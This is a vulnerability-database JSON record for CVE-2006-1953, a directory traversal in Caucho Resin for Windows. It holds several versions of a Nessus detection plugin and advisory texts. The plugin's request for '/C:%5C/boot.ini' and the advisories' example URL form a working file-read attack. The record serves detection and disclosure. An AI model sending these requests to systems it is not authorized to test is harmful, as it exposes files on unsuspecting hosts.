script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from 
web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "type": "nessus", "viewCount": 1}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-02T00:03:11"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:caucho:resin"], "cvelist": ["CVE-2006-1953"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.", "edition": 4, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "4bced821870bec24410903d105de44cda06661fe3c30fed576650d015fe10a5a", "hashmap": [{"hash": "1815f28d0d26a69f69e9aa346cfb841d", "key": "title"}, {"hash": "8969ce418fdd25af1ed884467625a5ca", "key": "href"}, {"hash": "9570f8e4e9af170494f007d8a35f0a26", "key": "modified"}, {"hash": "6f10b73f4afe1b28494745550233b016", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "878579eaa9f4f2a252e909b75890c924", "key": "pluginID"}, {"hash": 
"05304142f12617fe4e16be3bc21e8470", "key": "published"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f2e2b4ef6864133ea892585933598162", "key": "references"}, {"hash": "84160926c2065f36145233973e942186", "key": "description"}, {"hash": "13dd5af15e7bb84751f8448055a796c1", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "b51224ecfbf0f2e065b2f0cbb0c2e9ec", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "id": "RESIN_DIR_TRAVERSAL.NASL", "lastseen": "2018-08-30T19:53:26", "modified": "2018-07-27T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "21606", "published": "2006-05-27T00:00:00", "references": ["http://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", 
value:\"http://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like 
boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:53:26"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "b51224ecfbf0f2e065b2f0cbb0c2e9ec"}, {"key": "cvelist", "hash": "6f10b73f4afe1b28494745550233b016"}, {"key": "cvss", "hash": "313104e31e57b9f7aa405f5f0fc56a4e"}, {"key": "description", "hash": "fcbb223297efb9c25944b85dbf4f0c52"}, {"key": "href", "hash": "8969ce418fdd25af1ed884467625a5ca"}, {"key": "modified", "hash": "015cb78ce50d3bd4e2fbe18f25603329"}, {"key": "naslFamily", "hash": "07a0416e4de2a26a0531240b230d9eca"}, {"key": "pluginID", "hash": "878579eaa9f4f2a252e909b75890c924"}, {"key": "published", "hash": "05304142f12617fe4e16be3bc21e8470"}, {"key": "references", "hash": "79a3d069e1f4328741af17d3fccf32cd"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "8e42d3c54b9b50456eedee858f471fbf"}, {"key": "title", "hash": "1815f28d0d26a69f69e9aa346cfb841d"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "9bcc763acfe7adc5374758c4b5015265b77a7e2a59a39bf72a2dd46fba7beafe", "viewCount": 1, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-1953"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:46471"]}, {"type": "osvdb", "idList": ["OSVDB:25570"]}, {"type": "securityvulns", "idList": 
["SECURITYVULNS:DOC:12706"]}], "modified": "2019-01-16T20:06:38"}, "vulnersScore": 4.3}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n 
script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "naslFamily": "Web Servers", "pluginID": "21606", "cpe": ["cpe:/a:caucho:resin"]}
{"cve": [{"lastseen": "2018-10-19T11:35:58", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in Caucho Resin 3.0.17 and 3.0.18 for Windows allows remote attackers to read arbitrary files via a \"C:%5C\" (encoded drive letter) in a URL.", "modified": "2018-10-18T12:37:21", "published": "2006-05-17T06:06:00", "id": "CVE-2006-1953", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1953", "title": "CVE-2006-1953", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:34", "bulletinFamily": "exploit", "description": "", "modified": "2006-05-22T00:00:00", "published": "2006-05-22T00:00:00", "href": "https://packetstormsecurity.com/files/46471/Rapid7-Security-Advisory-24.html", "id": "PACKETSTORM:46471", "type": "packetstorm", "title": "Rapid7 Security Advisory 24", "sourceData": "`_______________________________________________________________________ \nRapid7 Security Advisory \nVisit http://www.rapid7.com/ to download NeXpose, \nSC Magazine Winner of Best Vulnerability Management product. \n_______________________________________________________________________ \n \nRapid7 Advisory R7-0024 \nCaucho Resin Windows Directory Traversal Vulnerability \n \nPublished: May 16, 2006 \nRevision: 1.0 \nhttp://www.rapid7.com/advisories/R7-0024.html \n \nCVE: CVE-2006-1953 \n \n1. Affected system(s): \n \nKNOWN VULNERABLE: \no Caucho Resin v3.0.18 for Windows \no Caucho Resin v3.0.17 for Windows \n \nNOT VULNERABLE: \no Caucho Resin v3.0.19 \no Caucho Resin v3.0.16 and earlier \n \n2. Summary \n \nThe Caucho Resin web application server for Windows contains a \ndirectory traversal vulnerability that allows remote \nunauthenticated users to download any file from the system. It is \npossible to download files from any drive on the system. \n \nRapid7 have updated NeXpose to check for this vulnerability. 
Licensed \ncustomers will receive the new vulnerability checks automatically. \nVisit http://www.rapid7.com to register for a free demo of NeXpose. \n \n3. Vendor status and information \n \nCaucho Technology, Inc. \nhttp://www.caucho.com/ \n \nCaucho was notified of this vulnerability on April 20th, 2006. \nThey fixed this vulnerability in the latest unofficial snapshot \nof Resin 3.0.19, available from Caucho's website. \n \n4. Solution \n \nUpgrade to the latest snapshot version of Resin, version 3.0.19. \n \n5. Detailed analysis \n \nCaucho Resin is a servlet and JSP server. Resin ships with its own \nstandalone web server which runs by default on port 8080. Any remote \nuser can request URLs of the form: \n \nhttp://victim:8080/C:%5C/ \n \nto access the root of the C: drive (and any files below it). Any \ndrive letter can be specified. Only Resin on Windows is vulnerable. \n \nThis vulnerability appears to have been introduced in Resin \nversion 3.0.17, although this has not been confirmed by the vendor. \n \n6. Contact Information \n \nRapid7 Security Advisories \nEmail: advisory@rapid7.com \nWeb: http://www.rapid7.com/ \nPhone: +1 (617) 603-0700 \n \n7. Disclaimer and Copyright \n \nRapid7, LLC is not responsible for the misuse of the information \nprovided in our security advisories. These advisories are a service \nto the professional security community. There are NO WARRANTIES \nwith regard to this information. Any application or distribution of \nthis information constitutes acceptance AS IS, at the user's own \nrisk. This information is subject to change without notice. \n \nThis advisory Copyright (C) 2006 Rapid7, LLC. Permission is \nhereby granted to redistribute this advisory, providing that no \nchanges are made and that the copyright notices and disclaimers \nremain intact. 
\n \n`\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/46471/R7-0024.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "description": "## Vulnerability Description\nCaucho Resin contains a flaw that allows a remote attacker to disclose the content of arbitrary files outside of the web path. The issue is due to an input validation error when processing specially crafted HTTP requests containing the \"%5C\" sequence.\n## Solution Description\nUpgrade to version 3.0.19 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nCaucho Resin contains a flaw that allows a remote attacker to disclose the content of arbitrary files outside of the web path. The issue is due to an input validation error when processing specially crafted HTTP requests containing the \"%5C\" sequence.\n## Manual Testing Notes\nhttp://[target]:8080/C:%5C/\n## References:\nVendor URL: http://www.caucho.com/resin/index.xtp\n[Secunia Advisory ID:20125](https://secuniaresearch.flexerasoftware.com/advisories/20125/)\n[Related OSVDB ID: 25571](https://vulners.com/osvdb/OSVDB:25571)\nOther Advisory URL: http://www.rapid7.com/advisories/R7-0024.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0385.html\nKeyword: R7-0024\nISS X-Force ID: 26478\nFrSIRT Advisory: ADV-2006-1831\n[CVE-2006-1953](https://vulners.com/cve/CVE-2006-1953)\nBugtraq ID: 18005\n", "modified": "2006-05-16T07:17:34", "published": "2006-05-16T07:17:34", "href": "https://vulners.com/osvdb/OSVDB:25570", "id": "OSVDB:25570", "title": "Caucho Resin Encoded Path Request Arbitrary File Access", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:17", "bulletinFamily": "software", 
"description": "_______________________________________________________________________\r\n Rapid7 Security Advisory\r\n Visit http://www.rapid7.com/ to download NeXpose,\r\n SC Magazine Winner of Best Vulnerability Management product.\r\n_______________________________________________________________________\r\n\r\nRapid7 Advisory R7-0024\r\nCaucho Resin Windows Directory Traversal Vulnerability\r\n\r\n Published: May 16, 2006\r\n Revision: 1.0\r\n http://www.rapid7.com/advisories/R7-0024.html\r\n\r\n CVE: CVE-2006-1953\r\n\r\n1. Affected system(s):\r\n\r\n KNOWN VULNERABLE:\r\n o Caucho Resin v3.0.18 for Windows\r\n o Caucho Resin v3.0.17 for Windows\r\n\r\n NOT VULNERABLE:\r\n o Caucho Resin v3.0.19\r\n o Caucho Resin v3.0.16 and earlier\r\n\r\n2. Summary\r\n\r\n The Caucho Resin web application server for Windows contains a\r\n directory traversal vulnerability that allows remote\r\n unauthenticated users to download any file from the system. It is\r\n possible to download files from any drive on the system.\r\n\r\n Rapid7 have updated NeXpose to check for this vulnerability. Licensed\r\n customers will receive the new vulnerability checks automatically.\r\n Visit http://www.rapid7.com to register for a free demo of NeXpose.\r\n\r\n3. Vendor status and information\r\n\r\n Caucho Technology, Inc.\r\n http://www.caucho.com/\r\n\r\n Caucho was notified of this vulnerability on April 20th, 2006.\r\n They fixed this vulnerability in the latest unofficial snapshot\r\n of Resin 3.0.19, available from Caucho's website.\r\n\r\n4. Solution\r\n\r\n Upgrade to the latest snapshot version of Resin, version 3.0.19.\r\n\r\n5. Detailed analysis\r\n\r\n Caucho Resin is a servlet and JSP server. Resin ships with its own\r\n standalone web server which runs by default on port 8080. Any remote\r\n user can request URLs of the form:\r\n\r\n http://victim:8080/C:%5C/\r\n\r\n to access the root of the C: drive (and any files below it). Any\r\n drive letter can be specified. 
Only Resin on Windows is vulnerable.\r\n\r\n This vulnerability appears to have been introduced in Resin\r\n version 3.0.17, although this has not been confirmed by the vendor.\r\n\r\n6. Contact Information\r\n\r\n Rapid7 Security Advisories\r\n Email: advisory@rapid7.com\r\n Web: http://www.rapid7.com/\r\n Phone: +1 (617) 603-0700\r\n\r\n7. Disclaimer and Copyright\r\n\r\n Rapid7, LLC is not responsible for the misuse of the information\r\n provided in our security advisories. These advisories are a service\r\n to the professional security community. There are NO WARRANTIES\r\n with regard to this information. Any application or distribution of\r\n this information constitutes acceptance AS IS, at the user's own\r\n risk. This information is subject to change without notice.\r\n\r\n This advisory Copyright (C) 2006 Rapid7, LLC. Permission is\r\n hereby granted to redistribute this advisory, providing that no\r\n changes are made and that the copyright notices and disclaimers\r\n remain intact.\r\n", "modified": "2006-05-17T00:00:00", "published": "2006-05-17T00:00:00", "id": "SECURITYVULNS:DOC:12706", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12706", "title": "Caucho Resin Windows Directory Traversal Vulnerability", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}]}